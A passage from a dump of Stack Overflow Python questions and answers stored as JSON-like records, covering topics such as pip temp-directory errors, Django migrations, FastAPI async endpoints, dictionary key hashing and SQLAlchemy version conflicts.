b times, therefor the complexity is O(b) = O(n)\nHis argument:\nsince there are n bits, a\\b value can be no more than (2^n)-1,\ntherefor the max number of calls will be O(2^n)","Title":"Time complexity of recursion of multiplication","Tags":"python,recursion,time-complexity,big-o","AnswerCount":3,"A_Id":75449149,"Answer":"You are both right.\nIf we disregard the time complexity of addition (and you might discuss whether you have reason to do so or not) and count only the number of iterations, then you are both right because you define:\nn = b\nand your friend defines\nn = log_2(b)\nso the complexity is O(b) = O(2^log_2(b)).\nBoth definitions are valid and both can be practical. You look at the input values, your friend at the lengths of the input, in bits.\nThis is a good demonstration why big-O expressions mean nothing if you don't define the variables used in those expressions.","Users Score":2,"is_accepted":false,"Score":0.1325487884,"Available Count":3},{"Q_Id":75449511,"CreationDate":"2023-02-14 14:47:36","Q_Score":1,"ViewCount":1250,"Question":"I recently came across this error while using \"pip install\" with python version 3.10 and pip version 22.3.1:\nERROR: Exception:\nTraceback (most recent call last):\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\cli\\base_command.py\", line 160, in exc_logging_wrapper\n status = run_func(*args)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\cli\\req_command.py\", line 247, in wrapper\n return func(self, options, args)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\commands\\download.py\", line 103, in run\n build_tracker = self.enter_context(get_build_tracker())\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\cli\\command_context.py\", line 27, in enter_context\n return self._main_context.enter_context(context_provider)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\contextlib.py\", line 492, in enter_context\n result = _cm_type.__enter__(cm)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\contextlib.py\", line 135, in __enter__\n return next(self.gen)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\operations\\build\\build_tracker.py\", line 46, in get_build_tracker\n root = ctx.enter_context(TempDirectory(kind=\"build-tracker\")).path\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\utils\\temp_dir.py\", line 125, in __init__\n path = self._create(kind)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\site-packages\\pip\\_internal\\utils\\temp_dir.py\", line 164, in _create\n path = os.path.realpath(tempfile.mkdtemp(prefix=f\"pip-{kind}-\"))\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 357, in mkdtemp\n prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 126, in _sanitize_params\n dir = gettempdir()\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 299, in gettempdir\n return _os.fsdecode(_gettempdir())\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 292, in _gettempdir\n tempdir = _get_default_tempdir()\n File \"C:\\Program Files\\WindowsApps\\PythonSoftwareFoundation.Python.3.10_3.10.2800.0_x64__qbz5n2kfra8p0\\lib\\tempfile.py\", line 223, in _get_default_tempdir\n raise FileNotFoundError(_errno.ENOENT,\nFileNotFoundError: [Errno 2] No usable temporary directory found in ['C:\\\\Users\\\\leon\\\\AppData\\\\Local\\\\Temp', 'C:\\\\Users\\\\leon\\\\AppData\\\\Local\\\\Temp', 'C:\\\\Users\\\\leon\\\\AppData\\\\Local\\\\Temp', 'C:\\\\windows\\\\Temp', 'c:\\\\temp', 'c:\\\\tmp', '\\\\temp', '\\\\tmp', 'C:\\\\Users\\\\leon']\nWARNING: There was an error checking the latest version of pip.\n\nBefore that there was a acess error with the console history which I had been able to solve, but no mater what I try this error always comes up. I also tried reinstalling python 3.10 and I also tried it with python 3.11 but it's always this error when using pip install. There also was this weird error in Pycharm where it couldn't set upt the virtual env but this is also fixed aready.\nThanks in advance.","Title":"Error with pip version 22.3.1 and Python version 3.10","Tags":"python,python-3.x,pip","AnswerCount":1,"A_Id":75449728,"Answer":"If you read the code for tempfile.py shown in the trace and particulary: _get_default_tempdir() implementation, you will see that the code does following:\n\nget the list of all possible temp directory locations (eg, this list is shown in the actual Exception)\nIterate the list it got\nTries to write a small random file into a given directory\nIf that works, return the directory name to be used as temporary path.\nIf not, iterate the rest of the list from 2.\nIf the list gets iterated to the end, you will get the exception you are now seeing.\n\nSo, essentially, your pip install will try to write to bunch of different temporary locations but each one of those fail.\nThis is most likely that each of those locations, your user does not have write access or your filesystem is full, or there could be some AV tool that blocks writes to these locations or some other reason.\nDo check these directories:\n\nC:\\Users\\leon\\AppData\\Local\\Temp\nC:\\Users\\leon\\AppData\\Local\\Temp\nC:\\Users\\leon\\AppData\\Local\\Temp\nC:\\windows\\Temp\nc:\\temp\nc:\\tmp\nC:\\Users\\leon\n\nOR before you run pip, set TMP and TEMP environment variables to point to location where you can write to.","Users Score":2,"is_accepted":false,"Score":0.3799489623,"Available Count":1},{"Q_Id":75449803,"CreationDate":"2023-02-14 15:11:21","Q_Score":1,"ViewCount":74,"Question":"Is there a way to get the exact date\/time from the web rather than taking the PC date\/time?\nI am creating a website where the answer is time relevant. But i don't want someone cheating by putting their pc clock back. When i do:\ntoday = datetime.datetime.today()\n\nor\nnow = datetime.datetime.utcnow().replace(tzinfo=utc)\n\nI still get whatever time my pc is set to.\nIs there a way to get the correct date\/time.","Title":"Django Correct Date \/ Time not PC date\/time","Tags":"python,django,python-datetime","AnswerCount":1,"A_Id":75452728,"Answer":"datetime.today() takes its time information from the server your application is running on. If you currently run your application with python manage.py localhost:8000, the server is your local PC. In this scenario, you can tamper with the time setting of your PC and see different results.\nBut in production environment, your hosting server will provide the time information. Unless you have a security issue, no unauthorized user should be able to change that.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75450060,"CreationDate":"2023-02-14 15:34:27","Q_Score":1,"ViewCount":50,"Question":"I sometimes use jupyter console to try out things in python.\nI'm running arch linux and installed everything through the arch repos.\nI hadn't ran jupyter console in quite some time, but while trying to launch it, i can't get it to work anymore.\nHere is the error :\nJupyter console 6.5.1\n\nPython 3.10.9 (main, Dec 19 2022, 17:35:49) [GCC 12.2.0]\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.10.0 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: \nTask exception was never retrieved\nfuture: exception=TypeError(\"object int can't be used in 'await' expression\")>\nTraceback (most recent call last):\n File \"\/usr\/lib\/python3.10\/site-packages\/jupyter_console\/ptshell.py\", line 842, in handle_external_iopub\n poll_result = await self.client.iopub_channel.socket.poll(500)\nTypeError: object int can't be used in 'await' expression\nShutting down kernel\n\nI tried reinstalling everything through pacman in case I accidentally changed something I shouldn't, but it changed nothing.\nAny tips on what could be wrong ?","Title":"jupyter console doesn't work on my computer anymore","Tags":"python,archlinux,jupyter-console","AnswerCount":1,"A_Id":75456724,"Answer":"I don't have enough rep to comment but I do not have the same issue. I can launch Jupyter QT Console just fine, and I have the same python version and IPython version. Just thought I would share, even though I don't use Jupyter Console. I do all my .ipynb in vscode and all other coding in neovim. I don't know if there is a difference between the console you are talking about and QT console, but Jupyter QT Console works fine for me, just unbearably light theme :).","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75453995,"CreationDate":"2023-02-14 22:55:53","Q_Score":9,"ViewCount":7767,"Question":"It was working perfectly earlier but for some reason now I am getting strange errors.\npandas version: 1.2.3\nmatplotlib version: 3.7.0\nsample dataframe:\ndf\n cap Date\n0 1 2022-01-04\n1 2 2022-01-06\n2 3 2022-01-07\n3 4 2022-01-08\n\ndf.plot(x='cap', y='Date')\nplt.show()\n\ndf.dtypes\ncap int64\nDate datetime64[ns]\ndtype: object\n\nI get a traceback:\nTraceback (most recent call last):\n File \"\/Library\/Developer\/CommandLineTools\/Library\/Frameworks\/Python3.framework\/Versions\/3.8\/lib\/python3.8\/code.py\", line 90, in runcode\n exec(code, self.locals)\n File \"\", line 1, in \n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_core.py\", line 955, in __call__\n return plot_backend.plot(data, kind=kind, **kwargs)\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_matplotlib\/__init__.py\", line 61, in plot\n plot_obj.generate()\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_matplotlib\/core.py\", line 279, in generate\n self._setup_subplots()\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/pandas\/plotting\/_matplotlib\/core.py\", line 337, in _setup_subplots\n fig = self.plt.figure(figsize=self.figsize)\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/_api\/deprecation.py\", line 454, in wrapper\n return func(*args, **kwargs)\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 813, in figure\n manager = new_figure_manager(\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 382, in new_figure_manager\n _warn_if_gui_out_of_main_thread()\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 360, in _warn_if_gui_out_of_main_thread\n if _get_required_interactive_framework(_get_backend_mod()):\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 208, in _get_backend_mod\n switch_backend(rcParams._get(\"backend\"))\n File \"\/Volumes\/coding\/venv\/lib\/python3.8\/site-packages\/matplotlib\/pyplot.py\", line 331, in switch_backend\n manager_pyplot_show = vars(manager_class).get(\"pyplot_show\")\nTypeError: vars() argument must have __dict__ attribute","Title":"Pandas plot, vars() argument must have __dict__ attribute?","Tags":"python,pandas,matplotlib","AnswerCount":2,"A_Id":75657421,"Answer":"The solution by NEStenerus did not work for me, because I don't have tkinter installed and did not want to change my package configuration.\nAlternative Fix\nInstead, you can disable the \"show plots in tool window\" option, by going to\nSettings | Tools | Python Scientific | Show plots in tool window and unchecking it.","Users Score":4,"is_accepted":false,"Score":0.3799489623,"Available Count":1},{"Q_Id":75454498,"CreationDate":"2023-02-15 00:30:10","Q_Score":1,"ViewCount":28,"Question":"I have a n x n dimensional numpy array of eigenvectors as columns, and want to return the last v of them as another array. However, they are currently in ascending order, and I wish to return them in descending order.\nCurrently, I'm attempting to index as follows\neigenvector_array[:,-1:-v]\n\nBut this doesn't seem to be working. Is there a more efficient way to do this?","Title":"Reverse Index through a numPy ndarray","Tags":"python,numpy,indexing","AnswerCount":2,"A_Id":75454533,"Answer":"Lets re-write this to make it a little less confusing.\neigenvector_array[:,-1:-v]\nto:\neigenvector_array[:][-1:-v]\nNow remember how slicing works in python:\n[start:stop:step]\nIf you set step. to -1 it will return them in reverse, so:\neigenvector_array[:,-1:-v:-1] should be your answer.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75457859,"CreationDate":"2023-02-15 09:37:32","Q_Score":2,"ViewCount":42,"Question":"I am building a snakmake pipeline, in the final rule i have an existing files that i want the snakefile to append to:\nHere is the rule:\nrule Amend: \n input:\n Genome_stats = expand(\"global_temp_workspace\/result\/{sample}.Genome.stats.tsv\", sample= sampleID),\n GenomeSNV = expand(\"global_temp_workspace\/result\/{sample}.Genome.SNVs.tsv\", sample= sampleID),\n GenomesConsensus = expand(\"global_temp_workspace\/analysis\/{sample}.renamed.consensus.fasta\", sample= sampleID),\n output: \n Genome_stats=\"global_temp_workspace\/result\/Genome.stats.tsv\",\n GenomeSNV=\"global_temp_workspace\/result\/Genome.SNVs.tsv\",\n GenomesConsensus=\"global_temp_workspace\/result\/Genomes.consensus.fasta\"\n threads: workflow.cores\n shell: \n \"\"\"\n cat {input.Genome_stats} | tail -n +2 >> {output.Genome_stats} ;\\ \n cat {input.GenomesConsensus} >> {output.GenomesConsensus} ;\\ \n cat {input.GenomeSNV} | tail -n +2 >> {output.GenomeSNV} ;\\ \n \"\"\"\n\nhow can i solve it?\nThank you\nI tried to do the dynamic() in the output and adding the touch {output.Genome_stats} {output.GenomesConsensus} {output.GenomeSNV} at the end of the shell. but did not work.\nwhenevr i run the snakemake i get:\n$ time snakemake --snakefile V2.5.smk --cores all \nBuilding DAG of jobs...\nNothing to be done.\nComplete log: .snakemake\/log\/2023-02-15T123050.937009.snakemake.log\n\nreal 0m1.022s\nuser 0m2.744s\nsys 0m2.797s","Title":"How can I make snakefile rule append the results to the input file of the rule file?","Tags":"python,pipeline,snakemake","AnswerCount":1,"A_Id":75460060,"Answer":"This behaviour is not idempotent and is usually a recipe for trouble. What happens if the machine breaks down or the process is killed during the write stage? What happens if a rule is accidentally ran twice?\nAs advised by @Cornelius Roemer in the comment to the question, the safer way is to write to a new file. If the overwrite-like behaviour is desired, then the new file can be moved to the original file location, but some record\/checkpoint file should be created to make sure that Snakemake knows not to re-process the file.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75459812,"CreationDate":"2023-02-15 12:29:13","Q_Score":1,"ViewCount":84,"Question":"I am developing python projects under git control using poetry to manage my venvs.\nFrom my project's directory I issue a \"poetry shell\" command and my new shell command prompt becomes something like:\n(isagog-ai-py3.10) (base) bob@Roberts-Mac-mini isagog-ai %\n\nwhere the first part in bracket gives me the name pf the project and the python version I'm using, and the last part of the prompt is my current directory name.\nBut what is it that gives me the \"(base)\" part? I'm actually working on a \"dev\" branch.","Title":"Poetry shell command prompt: what gives the (base) part?","Tags":"git,shell,python-venv,python-poetry","AnswerCount":1,"A_Id":75463086,"Answer":"This is base environment from conda.","Users Score":2,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75462208,"CreationDate":"2023-02-15 15:46:09","Q_Score":1,"ViewCount":67,"Question":"I am trying to split my django settings into production and development. Th ebiggest question that I have is how to use two different databases for the two environments? How to deal with migrations?\nI tried changing the settings for the development server to use a new empty database, however, I can not apply the migrations to create the tables that I already have in the production database.\nAll the guides on multiple databases focus on the aspect of having different types of data in different databases (such as users database, etc.) but not the way I am looking for.\nCould you offer some insights about what the best practices are and how to manage the two databases also in terms of migrations?\nEDIT:\nHere is what I get when I try to run python manage.py migrate on the new database:\nTraceback (most recent call last):\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 85, in _execute\n return self.cursor.execute(sql, params)\npsycopg2.errors.UndefinedTable: relation \"dashboard_posttags\" does not exist\nLINE 1: ...ags\".\"tag\", \"dashboard_posttags\".\"hex_color\" FROM \"dashboard...\n ^\n\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n File \"\/......\/manage.py\", line 22, in \n main()\n File \"\/......\/manage.py\", line 18, in main\n execute_from_command_line(sys.argv)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/__init__.py\", line 425, in execute_from_command_line\n utility.execute()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/__init__.py\", line 419, in execute\n self.fetch_command(subcommand).run_from_argv(self.argv)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 373, in run_from_argv\n self.execute(*args, **cmd_options)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 417, in execute\n output = self.handle(*args, **options)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 90, in wrapped\n res = handle_func(*args, **kwargs)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/commands\/migrate.py\", line 75, in handle\n self.check(databases=[database])\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/management\/base.py\", line 438, in check\n all_issues = checks.run_checks(\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/checks\/registry.py\", line 77, in run_checks\n new_errors = check(app_configs=app_configs, databases=databases)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/checks\/urls.py\", line 13, in check_url_config\n return check_resolver(resolver)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/core\/checks\/urls.py\", line 23, in check_resolver\n return check_method()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/urls\/resolvers.py\", line 446, in check\n for pattern in self.url_patterns:\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/utils\/functional.py\", line 48, in __get__\n res = instance.__dict__[self.name] = self.func(instance)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/urls\/resolvers.py\", line 632, in url_patterns\n patterns = getattr(self.urlconf_module, \"urlpatterns\", self.urlconf_module)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/utils\/functional.py\", line 48, in __get__\n res = instance.__dict__[self.name] = self.func(instance)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/urls\/resolvers.py\", line 625, in urlconf_module\n return import_module(self.urlconf_name)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/importlib\/__init__.py\", line 127, in import_module\n return _bootstrap._gcd_import(name[level:], package, level)\n File \"\", line 1030, in _gcd_import\n File \"\", line 1007, in _find_and_load\n File \"\", line 986, in _find_and_load_unlocked\n File \"\", line 680, in _load_unlocked\n File \"\", line 850, in exec_module\n File \"\", line 228, in _call_with_frames_removed\n File \"\/......\/app\/urls.py\", line 11, in \n from main_platform.views.investor import AccountView, profile, app_home_redirect\n File \"\/......\/main_platform\/views\/investor.py\", line 118, in \n class PostFilter(django_filters.FilterSet):\n File \"\/......\/main_platform\/views\/investor.py\", line 124, in PostFilter\n for tag in PostTags.objects.all():\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/query.py\", line 280, in __iter__\n self._fetch_all()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/auto_prefetch\/__init__.py\", line 98, in _fetch_all\n super()._fetch_all()\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/query.py\", line 1354, in _fetch_all\n self._result_cache = list(self._iterable_class(self))\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/query.py\", line 51, in __iter__\n results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/models\/sql\/compiler.py\", line 1202, in execute_sql\n cursor.execute(sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 99, in execute\n return super().execute(sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/sentry_sdk\/integrations\/django\/__init__.py\", line 563, in execute\n return real_execute(self, sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 67, in execute\n return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 76, in _execute_with_wrappers\n return executor(sql, params, many, context)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 85, in _execute\n return self.cursor.execute(sql, params)\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/utils.py\", line 90, in __exit__\n raise dj_exc_value.with_traceback(traceback) from exc_value\n File \"\/opt\/homebrew\/Caskroom\/miniforge\/base\/envs\/stokk\/lib\/python3.9\/site-packages\/django\/db\/backends\/utils.py\", line 85, in _execute\n return self.cursor.execute(sql, params)\ndjango.db.utils.ProgrammingError: relation \"dashboard_posttags\" does not exist\nLINE 1: ...ags\".\"tag\", \"dashboard_posttags\".\"hex_color\" FROM \"dashboard...","Title":"Separate databases for development and production in Djang","Tags":"python,django,postgresql","AnswerCount":2,"A_Id":75463997,"Answer":"If you have a new empty database, you can just run \"python manage.py migrate\" and all migrations will be executed on the new database. The already done migrations will be stored in a table in that database so that django always \"remembers\" the migrations state of each individual database. Of course that new database will only have the tables structure - there is not yet any data copied!\nDoes this answer your question?","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75462560,"CreationDate":"2023-02-15 16:15:04","Q_Score":1,"ViewCount":52,"Question":"I'm reading in a list of samples from a text file and in that list every now and then there is a \"channel n\" checkpoint. The file is terminated with the text eof. The code that works until it hits the eof which it obviously cant cast as a float\nlog = open(\"mq_test.txt\", 'r')\ndata = []\nfor count, sample in enumerate(log):\n if \"channel\" not in sample:\n data.append(float(sample))\n \nprint(count)\nlog.close()\n\nSo to get rid of the ValueError: could not convert string to float: 'eof\\n' I added an or to my if as so,\nlog = open(\"mq_test.txt\", 'r')\ndata = []\nfor count, sample in enumerate(log):\n if \"channel\" not in sample or \"eof\" not in sample:\n data.append(float(sample))\n \nprint(count)\nlog.close()\n\nAnd now I get ValueError: could not convert string to float: 'channel 00\\n'\nSo my solution has been to nest the ifs & that works.\nCould somebody explain to me why the or condition failed though?","Title":"Unexpected behavior using if .. or .. Python","Tags":"python,if-statement","AnswerCount":2,"A_Id":75462636,"Answer":"I think it's a logic issue which \"and\" might be used instead of \"or\"","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75463993,"CreationDate":"2023-02-15 18:25:05","Q_Score":1,"ViewCount":501,"Question":"I have two scripts:\nfrom fastapi import FastAPI\nimport asyncio\n\napp = FastAPI()\n\n@app.get(\"\/\")\nasync def root():\n a = await asyncio.sleep(10)\n return {'Hello': 'World',}\n\nAnd second one:\nfrom fastapi import FastAPI\nimport time\n \napp = FastAPI()\n\n@app.get(\"\/\")\ndef root():\n a = time.sleep(10)\n return {'Hello': 'World',}\n\nPlease note the second script doesn't use async. Both scripts do the same, at first I thought, the benefit of an async script is that it allows multiple connections at once, but when testing the second code, I was able to run multiple connections as well. The results are the same, performance is the same and I don't understand why would we use async method. Would appreciate your explanation.","Title":"What does async actually do in FastAPI?","Tags":"python-3.x,asynchronous,async-await,fastapi","AnswerCount":2,"A_Id":75464345,"Answer":"FastAPI Docs:\n\nYou can mix def and async def in your path operation functions as much as you need and define each one using the best option for you. FastAPI will do the right thing with them.\nAnyway, in any of the cases above, FastAPI will still work asynchronously and be extremely fast.\n\nBoth endpoints will be executed asynchronously, but if you define your endpoint function asynchronously, it will allow you to use await keyword and work with asynchronous third party libraries","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75464645,"CreationDate":"2023-02-15 19:33:13","Q_Score":2,"ViewCount":75,"Question":"I was going through twitter when i came across the function below\ndef func():\n d = {1: \"I\", 2.0: \"love\", 2: \"Python\"}\n return d[2.0]\nprint(func())\n\nWhen i ran the code, i got Python as the output and i expected it to be love. I know that you cannot have multiple key in a dictionary. However what i want to know is why Python Interpreter considers 2.0 and 2 as the same and returns the value of 2","Title":"Why does python interpreter consider 2.0 and 2 to be the same in an when used as a dictionary key","Tags":"python,function,dictionary","AnswerCount":2,"A_Id":75464741,"Answer":"In your example, the keys 2.0 and 2 are considered the same because their hash values are equal. This is because in Python, float and integer objects can be equal even if they have different types and representations. In particular, the integer 2 and the floating-point number 2.0 have the same value, so they are considered equal.\nThat's why you should always use consistent types for keys in dictionaries. Always remember to use integers or floats.","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75466757,"CreationDate":"2023-02-16 00:35:55","Q_Score":1,"ViewCount":62,"Question":"I've installed flake 8 in the terminal, but when i try and select python linter on vs code in the command palette i get the following error: \"Command 'Python: Select Linter' resulted in an error (command 'python.setLinter' not found)\". I'm on a mac, version 11.5.2.\nI have seen other solutions for this problem for windows on stack but not sure how to proceed on mac, please advise","Title":"trying to open flake8 on vs code from command palette error on mac","Tags":"python,visual-studio-code,flake8","AnswerCount":1,"A_Id":75466977,"Answer":"There are many possibilities. You can try the following methods:\n\nReinstall Python extension or use Pre-release version.\nStart VsCode as administrator.\nTry to delete the.vscode folder in the project.","Users Score":-2,"is_accepted":false,"Score":-0.3799489623,"Available Count":1},{"Q_Id":75468479,"CreationDate":"2023-02-16 06:14:37","Q_Score":1,"ViewCount":250,"Question":"I'm using Python 3.7.4 in a venv environment.\nI ran pip install teradataml==17.0.0.3 which installs a bunch of dependent packages, including sqlalchemy.\nAt the time, it installed SQLAlchemy==2.0.2.\nI ran the below code, and received this error:\nArgumentError: Additional keyword arguments are not accepted by this function\/method. The presence of **kw is for pep-484 typing purposes\nfrom teradataml import create_context \n\nclass ConnectToTeradata:\n def __init__(self):\n \n host = 'AWESOME_HOST'\n username = 'johnnyMnemonic'\n password = 'keanu4life'\n\n self.connection = create_context(host = host, user = username, password = password)\n\n def __del__(self):\n print(\"Closing connection\")\n self.connection.dispose()\n\nConnectToTeradata()\n\nIf I install SQLAlchemy==1.4.26 before teradataml, I no longer get the error and successfuly connect.\nThis suggests SQLAlchemy==2.0.2 is not compatible with teradataml==17.0.0.3.\nI expected installing an older version of teradataml would also install older, compatible versions of dependent packages.\nWhen I install teradataml==17.0.0.3, can I force only install compatible versions of dependent packages?","Title":"When installing an old version of a package, can I install only compatible versions of dependent packages?","Tags":"python,python-3.x,sqlalchemy,teradata","AnswerCount":1,"A_Id":75525095,"Answer":"We are aware of the compatibility issues that were introduced in SQLAlchemy package 2.0.x versions. The new 2.0.x package directly affects the Teradata SQL dialect in the teradatasqlalchemy package. As a temporary measure, please downgrade SQLAlchemy to 1.4.46.\nTeradata Engineering is working on making the teradatasqlalchemy package compatible with the newer versions and a new package is slated to be released in March 2023.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75471318,"CreationDate":"2023-02-16 11:02:36","Q_Score":19,"ViewCount":14233,"Question":"Whenever I try to read Excel using\npart=pd.read_excel(path,sheet_name = mto_sheet)\n\nI get this exception:\n\n 'ReadOnlyWorksheet' object has no attribute 'defined_names'\n\nThis is if I use Visual Studio Code and Python 3.11. However, I don't have this problem when using Anaconda. Any reason for that?","Title":"'ReadOnlyWorksheet' object has no attribute 'defined_names'","Tags":"python,exception","AnswerCount":3,"A_Id":76009052,"Answer":"Possible workaround: create new excel file, with default worksheet name (\"Sheet1\" etc.) and copy and paste data here.\n(tested on Python 3.10.9 + openpyxl==3.1.1)","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":1},{"Q_Id":75472653,"CreationDate":"2023-02-16 12:59:08","Q_Score":1,"ViewCount":40,"Question":"Following JSON File (raw data how I am getting it back from an API call):\n{\n \"code\": \"200000\",\n \"data\": {\n \"A\": \"0.43221600\",\n \"B\": \"0.02311155\",\n \"C\": \"0.55057515\",\n \"D\": \"2.15957924\",\n \"E\": \"0.03818908\",\n \"F\": \"0.26853420\",\n \"G\": \"0.15007500\",\n \"H\": \"0.00685843\",\n \"I\": \"0.08500848\"\n }\n}\n\nWill crate this output in Pandas by using this code (one column per data set in \"data\"). The result is a dataframe with many columns:\nimport pandas as pd\nimport json \nf = open('file.json', 'r')\nj1 = json.load(f)\npd.json_normalize(j1)\n\n code data.A data.B data.C data.D data.E data.F data.G data.H data.I\n0 200000 0.43221600 0.02311155 0.55057515 2.15957924 0.03818908 0.26853420 